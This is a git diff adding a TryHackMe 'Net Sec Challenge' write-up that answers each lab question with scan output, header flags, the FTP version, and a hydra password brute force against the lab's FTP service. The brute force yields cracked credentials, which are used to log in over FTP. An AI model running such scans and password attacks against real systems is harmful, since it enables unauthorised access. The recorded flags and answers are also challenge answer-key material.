net sec challenge

tryhackme/net_sec_challenge.md

@@ -0,0 +1,96 @@
+# Net Sec Challenge
+
+## Challenge Questions
+
+I'll do a `tools/enumeration/RustScan/target/release/rustscan -a 10.10.185.143 -u 5000 -- -sC -sV --vv --script vuln` which delivers nearly all the answers to the following questions.
+
+### What is the highest port number being open less than 10,000?
+```
+8080
+```
+
+### There is an open port outside the common 1000 ports; it is above 10,000. What is it?
+```
+10021
+```
+
+### How many TCP ports are open?
+These scanned protocols on the ports are all based on TCP.
+```
+6
+```
+
+### What is the flag hidden in the HTTP server header?
+```sh
+80/tcp    open  http        syn-ack lighttpd
+|_http-jsonp-detection: Couldn't find any JSONP endpoints.
+|_http-server-header: lighttpd THM{web_server_25352}
+```
+
+### What is the flag hidden in the SSH server header? 
+```sh
+SF-Port22-TCP:V=7.92%I=7%D=10/16%Time=616A0C7A%P=x86_64-pc-linux-gnu%r(NUL
+SF:L,29,"SSH-2\.0-OpenSSH_8\.2p1\x20THM{946219583339}\r\n");
+```
+```
+THM{946219583339}
+```
+### We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
+
+* `10021/tcp open  ftp         syn-ack vsftpd 3.0.3`
+```
+vsftp 3.0.3
+```
+
+### We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?
+
+Some bruteforcing via hydra
+```sh
+[whackx@manbox ~]$ hydra -L users -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ftp://10.10.185.143:10021
+Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
+
+Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-16 01:35:05
+[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
+[DATA] max 16 tasks per 1 server, overall 16 tasks, 28688796 login tries (l:2/p:14344398), ~1793050 tries per task
+[DATA] attacking ftp://10.10.185.143:10021/
+[10021][ftp] host: 10.10.185.143   login: eddie   password: jordan
+[10021][ftp] host: 10.10.185.143   login: quinn   password: andrea
+1 of 1 target successfully completed, 2 valid passwords found
+[WARNING] Writing restore file because 8 final worker threads did not complete until end.
+[ERROR] 8 targets did not resolve or could not be connected
+[ERROR] 0 target did not complete
+Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-16 01:35:36
+```
+
+Log in as `quinn`, download the flag via `get ftp_flag.txt`.
+```
+[whackx@manbox ~]$ ftp 10.10.185.143 10021
+Connected to 10.10.185.143.
+220 (vsFTPd 3.0.3)
+Name (10.10.185.143:whackx): quinn
+331 Please specify the password.
+Password:
+230 Login successful.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls -la
+200 PORT command successful. Consider using PASV.
+150 Here comes the directory listing.
+drwxr-xr-x    2 1002     1002         4096 Sep 20 08:36 .
+drwxr-xr-x    2 1002     1002         4096 Sep 20 08:36 ..
+-rw-r--r--    1 1002     1002          220 Sep 14 07:43 .bash_logout
+-rw-r--r--    1 1002     1002         3771 Sep 14 07:43 .bashrc
+-rw-r--r--    1 1002     1002          807 Sep 14 07:43 .profile
+-rw-------    1 1002     1002          723 Sep 20 08:27 .viminfo
+-rw-rw-r--    1 1002     1002           18 Sep 20 08:27 ftp_flag.txt
+226 Directory send OK.
+```
+
+### Browsing to http://10.10.185.143:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
+
+At first, I tried to be stealthy with something like the following.
+```sh
+[whackx@manbox ~]$ sudo nmap -T1 -sN -ff 10.10.185.143 -vv
+```
+That did not not work. So, I spun up an attack box and iterated through every flag possible.
+At some point the flag came up on the website.